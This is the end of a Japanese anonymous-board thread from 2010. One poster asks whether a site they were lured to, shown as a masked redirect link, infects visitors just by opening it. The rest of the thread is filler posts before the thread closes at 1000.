このサイトを踏まされたんだけど、ここも開いただけでウイルスに感染しちゃうサイトなのかな
どなたか教えてください
http://ime ●nu/amyou●net/?free/n/e/t/download/number=2010
埋めますよ
梅
生め
埋
984 :
979 :2010/04/24(土) 19:53:42
産め
>>984 ちょっとは自分で調べると良いよ
このスレにも報告されてる
さらに埋め
うめ
う
め
埋めます
生め
産め
お
っぱい
1000なら作者は死刑
1000昌夫
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。